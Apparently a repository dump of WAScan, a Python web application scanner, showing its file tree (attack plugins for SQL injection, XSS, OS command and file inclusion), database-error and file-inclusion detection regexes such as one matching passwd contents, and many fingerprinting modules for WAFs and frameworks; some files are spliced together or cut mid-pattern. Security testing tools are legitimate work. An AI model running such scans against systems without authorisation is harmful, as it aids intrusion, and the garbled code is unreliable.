├── CHANGELOG ├── VERSION ├── requirements.txt ├── screen ├── screen_1.png └── screen_2.png ├── lib ├── db │ ├── sqldberror │ │ ├── firebird.json │ │ ├── maxdb.json │ │ ├── frontbase.json │ │ ├── ingres.json │ │ ├── db2.json │ │ ├── hsqldb.json │ │ ├── informix.json │ │ ├── sybase.json │ │ ├── sqlite.json │ │ ├── oracle.json │ │ ├── maccess.json │ │ ├── postgresql.json │ │ ├── mysql.json │ │ └── mssql.json │ ├── errors │ │ ├── buffer.json │ │ ├── ldap.json │ │ ├── lfi.json │ │ └── xpath.json │ ├── phpinfo.wascan │ ├── adminpanel.wascan │ ├── backdoor.wascan │ └── commondir.wascan ├── __init__.py ├── request │ ├── __init__.py │ ├── ragent.py │ ├── request.py │ └── crawler.py ├── utils │ ├── __init__.py │ ├── unicode.py │ ├── readfile.py │ ├── colors.py │ ├── rand.py │ ├── exception.py │ ├── printer.py │ ├── settings.py │ ├── params.py │ ├── check.py │ ├── usage.py │ └── payload.py ├── handler │ ├── __init__.py │ ├── fullscan.py │ ├── crawler.py │ ├── audit.py │ ├── brute.py │ ├── disclosure.py │ ├── attacks.py │ └── fingerprint.py └── parser │ ├── __init__.py │ ├── getip.py │ ├── getmail.py │ ├── getcc.py │ ├── getssn.py │ └── parse.py ├── plugins ├── __init__.py ├── audit │ ├── __init__.py │ ├── xst.py │ ├── apache.py │ ├── phpinfo.py │ ├── robots.py │ └── dav.py ├── brute │ ├── __init__.py │ ├── adminpanel.py │ ├── backdoor.py │ ├── commonfile.py │ ├── backupfile.py │ ├── backupdir.py │ └── commondir.py ├── disclosure │ ├── __init__.py │ ├── emails.py │ ├── creditcards.py │ ├── privateip.py │ ├── ssn.py │ └── errors.py ├── attacks │ ├── __init__.py │ ├── ssi.py │ ├── bashi.py │ ├── htmli.py │ ├── xss.py │ ├── oscommand.py │ ├── headerxss.py │ ├── phpi.py │ ├── blindsqli.py │ ├── ldapi.py │ ├── xpathi.py │ ├── lfi.py │ ├── sqli.py │ ├── bufferoverflow.py │ └── headersqli.py └── fingerprint │ ├── __init__.py │ ├── cms │ ├── __init__.py │ ├── wordpress.py │ ├── silverstripe.py │ ├── joomla.py │ ├── drupal.py │ ├── plone.py │ └── magento.py │ ├── os │ ├── __init__.py │ ├── bsd.py │ ├── unix.py │ ├── mac.py │ ├── ibm.py │ ├── windows.py │ ├── solaris.py │ └── linux.py │ ├── waf │ ├── __init__.py │ ├── knownsec.py │ ├── wallarm.py │ ├── senginx.py │ ├── sophos.py │ ├── varnish.py │ ├── webknight.py │ ├── expressionengine.py │ ├── sitelock.py │ ├── uspses.py │ ├── betterwpsecurity.py │ ├── stingray.py │ ├── blockdos.py │ ├── armor.py │ ├── aws.py │ ├── edgecast.py │ ├── airlock.py │ ├── paloalto.py │ ├── teros.py │ ├── asm.py │ ├── kona.py │ ├── nsfocus.py │ ├── baidu.py │ ├── datapower.py │ ├── urlscan.py │ ├── yundun.py │ ├── ciscoacexml.py │ ├── comodo.py │ ├── fortiweb.py │ ├── newdefend.py │ ├── hyperguard.py │ ├── anquanbao.py │ ├── trafficshield.py │ ├── cloudfront.py │ ├── netcontinuum.py │ ├── barracuda.py │ ├── radware.py │ ├── safe3.py │ ├── safedog.py │ ├── netscaler.py │ ├── profense.py │ ├── yunsuo.py │ ├── sonicwall.py │ ├── denyall.py │ ├── dotdefender.py │ ├── binarysec.py │ ├── isaserver.py │ ├── modsecurity.py │ ├── secureiis.py │ ├── bigip.py │ ├── sucuri.py │ ├── requestvalidationmode.py │ ├── incapsula.py │ ├── jiasule.py │ └── cloudflare.py │ ├── header │ ├── __init__.py │ ├── cookies.py │ └── header.py │ ├── language │ ├── __init__.py │ ├── asp.py │ ├── flash.py │ ├── perl.py │ ├── python.py │ ├── ruby.py │ ├── coldfusion.py │ ├── php.py │ ├── java.py │ └── aspnet.py │ ├── server │ ├── __init__.py │ └── server.py │ └── framework │ ├── __init__.py │ ├── flask.py │ ├── cakephp.py │ ├── play.py │ ├── larvel.py │ ├── cherrypy.py │ ├── karrigell.py │ ├── codeigniter.py │ ├── dancer.py │ ├── nette.py │ ├── phalcon.py │ ├── spring.py │ ├── symfony.py │ ├── yii.py │ ├── web2py.py │ ├── fuelphp.py │ ├── grails.py │ ├── seagull.py │ ├── django.py │ ├── asp_mvc.py │ ├── zend.py │ ├── rails.py │ └── horde.py ├── .gitignore ├── README.md └── wascan.py /CHANGELOG: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /VERSION: -------------------------------------------------------------------------------- 1 | WAScan v0.1.0 -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | BeautifulSoup -------------------------------------------------------------------------------- /screen/screen_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FOGSEC/WAScan/HEAD/screen/screen_1.png -------------------------------------------------------------------------------- /screen/screen_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/FOGSEC/WAScan/HEAD/screen/screen_2.png -------------------------------------------------------------------------------- /lib/db/sqldberror/firebird.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"Firebird","regexp":["Dynamic SQL Error","Warning.*ibase_.*"]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/maxdb.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"SAP MaxDB","regexp":["SQL error.*POS([0-9]+).*","Warning.*maxdb.*"]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/frontbase.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"Frontbase","regexp":["Exception (condition )?\\d+. Transaction rollback."]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/ingres.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"Ingres","regexp":["Warning.*ingres_","Ingres SQLSTATE","Ingres\\W.*Driver"]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/db2.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"DB2","regexp":["CLI Driver.*DB2","DB2 SQL error","\bdb2_\\w+\\(","SQLSTATE.+SQLCODE"]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/hsqldb.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"HSQLDB","regexp":["org\\.hsqldb\\.jdbc","Unexpected end of command in statement \\[","Unexpected token.*in statement \\["]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/informix.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"Informix","regexp":["Exception.*Informix","Informix ODBC Driver","com\\.informix\\.jdbc","weblogic\\.jdbc\\.informix"]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/sybase.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"Sybase","regexp":["Warning.*sybase.*","Sybase message","Sybase.*Server message.*","SybSQLException","com\\.sybase\\.jdbc"]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/sqlite.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"SQLite","regexp":["SQLite/JDBCDriver","SQLite\\.Exception","System\\.Data\\.SQLite\\.SQLiteException","Warning.*sqlite_.*","Warning.*SQLite3::","\\[SQLITE_ERROR\\]"]}} -------------------------------------------------------------------------------- /lib/db/errors/buffer.json: -------------------------------------------------------------------------------- 1 | {"info":{"name":"BOF","regexp":["\\*\\*\\* stack smashing detected \\*\\*\\*:","\\\\\n\\500 Internal Server Error\\<\\/title\\>\n","Internal Server Error\\<\\/h1\\>"]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/oracle.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"Oracle","regexp":["\bORA-\\d{5}","Oracle error","Oracle.*Driver","Warning.*\\Woci_.*","Warning.*\\Wora_.*","oracle\\.jdbc\\.driver","quoted string not properly terminated"]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/maccess.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"Microsoft Access","regexp":["Microsoft Access (\\d+ )?Driver","JET Database Engine","Access Database Engine","ODBC Microsoft Access","Syntax error \\(missing operator\\) in query expression"]}} -------------------------------------------------------------------------------- /lib/db/sqldberror/postgresql.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"PostgreSQL","regexp":["PostgreSQL.*ERROR","Warning.*\\Wpg_.*","valid PostgreSQL result","Npgsql\\.","PG::SyntaxError:","org\\.postgresql\\.util\\.PSQLException","ERROR:\\s\\ssyntax error at or near "]}} -------------------------------------------------------------------------------- /lib/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt' 8 | -------------------------------------------------------------------------------- /lib/request/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /lib/utils/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt' -------------------------------------------------------------------------------- /plugins/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt' 8 | -------------------------------------------------------------------------------- /plugins/audit/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /plugins/brute/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /lib/handler/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt' 8 | -------------------------------------------------------------------------------- /lib/parser/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt' 8 | -------------------------------------------------------------------------------- /plugins/disclosure/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /plugins/attacks/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt' 8 | -------------------------------------------------------------------------------- /plugins/fingerprint/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /plugins/fingerprint/cms/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /plugins/fingerprint/os/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /plugins/fingerprint/waf/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /lib/db/sqldberror/mysql.json: -------------------------------------------------------------------------------- 1 | {"db":{"name":"MySQL","regexp":["SQL syntax.*MySQL","Warning.*mysql_.*","MySqlException \\(0x","valid MySQL result","check the manual that corresponds to your (MySQL|MariaDB) server version","MySqlClient\\.","com\\.mysql\\.jdbcd\\.exceptions"]}} -------------------------------------------------------------------------------- /plugins/fingerprint/header/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /plugins/fingerprint/language/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /plugins/fingerprint/server/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /plugins/fingerprint/framework/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt -------------------------------------------------------------------------------- /lib/db/errors/ldap.json: -------------------------------------------------------------------------------- 1 | {"info":{"name":"LDAP","regexp":["supplied argument is not a valid ldap","javax\\.naming\\.NameNotFoundException","javax\\.naming\\.directory\\.InvalidSearchFilterException","Invalid DN syntax","LDAPException*","Module Products\\.LDAPMultiPlugins","IPWorksASP\\.LDAP","Local error occurred","Object does not exist","An inappropriate matching occurred"]}} -------------------------------------------------------------------------------- /lib/utils/unicode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | def ucode(string): 10 | if isinstance(string,unicode): 11 | return string.encode('utf-8') 12 | return string -------------------------------------------------------------------------------- /lib/utils/readfile.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt' 8 | 9 | def readfile(path): 10 | """ read file """ 11 | if path != None or path != "": 12 | return [line.strip() for line in open(path,'rb')] 13 | return -------------------------------------------------------------------------------- /plugins/fingerprint/language/asp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import findall,I 10 | 11 | def asp(content): 12 | _ = findall(r'\Warning\\<\\/b\\>: file\\(","\\Warning\\<\\/b\\>: file_get_contents\\(","open_basedir restriction in effect","Failed opening [\\'\\S*\\'] for inclusion \\(","failed to open stream\\:","root\\:\\/root\\:\\/bin\\/bash","default=multi([0])disk([0])rdisk([0])partition([1])\\WINDOWS"]}} -------------------------------------------------------------------------------- /plugins/fingerprint/framework/symfony.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def symfony(headers,content): 12 | _ = False 13 | _ |= search(r"\"powered by symfony\"",content) is not None 14 | _ |= search(r"Powered by \",content) is not None 15 | if _ : return "Symfony - PHP Framework" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/cloudfront.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def cloudfront(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= header[0].lower() == "x-amz-cf-id" 15 | _ |= search(r'cloudfront',header[1],I) is not None 16 | if _: break 17 | if _ : 18 | return "CloudFront (Amazon)" -------------------------------------------------------------------------------- /plugins/fingerprint/framework/yii.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def yii(headers,content): 12 | _ = False 13 | _ |= search(r"\Yii Framework\<\/a\>",content) is not None 14 | _ |= search(r"\>Yii Framework\<\/a\>",content) is not None 15 | if _ : return "Yii - PHP Framework" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/netcontinuum.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def netcontinuum(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search(r'NCI__SessionId=',header[1],I) is not None 15 | if _:break 16 | if _ : 17 | return "NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/barracuda.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def barracuda(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search(r'\Abarra_counter_session=|(\A|\b)barracuda_',header[1],I) is not None 15 | if _ : break 16 | if _: 17 | return "Barracuda Web Application Firewall (Barracuda Networks)" -------------------------------------------------------------------------------- /plugins/fingerprint/framework/web2py.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def web2py(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search("web2py",header[1]) is not None 15 | if _ : break 16 | _ |= search(r"\
",content) is not None 17 | if _ : return "Web2Py - Python Framework" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/radware.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def radware(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= header[0] == "x-sl-compstate" 15 | if _:break 16 | _ |= search(r'Unauthorized Activity Has Been Detected.+Case Number:',content) is not None 17 | if _ : 18 | return "AppWall (Radware)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/safe3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def safe3(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search(r'Safe3 Web Firewall|Safe3',header[1],I) is not None 15 | _ |= search(r'Safe3WAF',header[1],I) is not None 16 | if _:break 17 | if _ : 18 | return "Safe3 Web Application Firewall" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/safedog.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def safedog(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search(r'safedog',header[1],I) is not None 15 | _ |= search(r'waf/2\.0',header[1],I) is not None 16 | if _:break 17 | if _ : 18 | return "Safedog Web Application Firewall (Safedog)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/netscaler.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def netscaler(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search(r'(ns_af=|citrix_ns_id|NSC_)',header[1],I) is not None 15 | _ |= search(r'ns.cache',header[1],I) is not None 16 | if _:break 17 | if _ : 18 | return "NetScaler (Citrix Systems)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/profense.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def profense(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search(r'profense',header[1],I) is not None 15 | _ |= search(r'PLBSID=',header[1],I) is not None 16 | if _:break 17 | if _ : 18 | return "Profense Web Application Firewall (Armorlogic)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/yunsuo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def yunsuo(headers,content): 12 | _ = False 13 | _ |= search('FuelPHP\<\/a\>",content) is not None 17 | if _ : return "FuelPHP - PHP Framework" -------------------------------------------------------------------------------- /plugins/fingerprint/framework/grails.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def grails(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search("grails",header[1]) is not None 15 | _ |= search("x-grails",header[0]) is not None 16 | _ |= search("x-grails-cached",header[0]) is not None 17 | if _ : break 18 | if _ : return "Grails - Java Framework" -------------------------------------------------------------------------------- /lib/handler/fullscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | 10 | from lib.utils.printer import * 11 | from lib.handler.audit import * 12 | from lib.handler.brute import * 13 | from lib.handler.attacks import * 14 | from lib.handler.disclosure import * 15 | from lib.handler.fingerprint import * 16 | 17 | def FullScan(kwargs,url,data): 18 | if '?' in url: 19 | Attacks(kwargs,url,data) 20 | Disclosure(kwargs,url,data) 21 | -------------------------------------------------------------------------------- /plugins/disclosure/emails.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from lib.utils.printer import * 10 | from lib.parser.parse import * 11 | 12 | def emails(content): 13 | _list_ = parse(content).getmail() 14 | if _list_ != None or _list_ != []: 15 | if len(_list_) >= 2: 16 | plus('Email address disclosure: %s'%(str(_list_).split('[')[1].split(']')[0])) 17 | elif len(_list_) == 1: 18 | plus('Email address disclosure: %s'%_list_[0]) -------------------------------------------------------------------------------- /lib/request/ragent.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from os import path 10 | from random import randint 11 | from lib.utils.readfile import * 12 | 13 | def ragent(): 14 | """random agent""" 15 | user_agents = () 16 | realpath = path.join(path.realpath(__file__).split('lib')[0],'lib/db/') 17 | realpath += "useragent.wascan" 18 | for _ in readfile(realpath): 19 | user_agents += (_,) 20 | return user_agents[randint(0,len(user_agents)-1)] -------------------------------------------------------------------------------- /plugins/fingerprint/waf/binarysec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def binarysec(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= header[0].lower() == "x-binarysec-via" 15 | _ |= header[0].lower() == "x-binarysec-nocache" 16 | _ |= search(r'binarySec',header[1],I) is not None 17 | if _: break 18 | if _ : 19 | return "BinarySEC Web Application Firewall (BinarySEC)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/isaserver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def isaserver(headers,content): 12 | _ = False 13 | _ |= search(r'The server denied the specified Uniform Resource Locator (URL). Contact the server administrator.',content) is not None 14 | _ |= search(r'The ISA Server denied the specified Uniform Resource Locator (URL)',content) is not None 15 | if _ : 16 | return "ISA Server (Microsoft)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/modsecurity.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def modsecurity(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search(r'Mod_Security|NOYB',header[1],I) is not None 15 | if _:break 16 | _ |= search(r'This error was generated by Mod_Security',content) is not None 17 | if _ : 18 | return "ModSecurity: Open Source Web Application Firewall (Trustwave)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/secureiis.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- 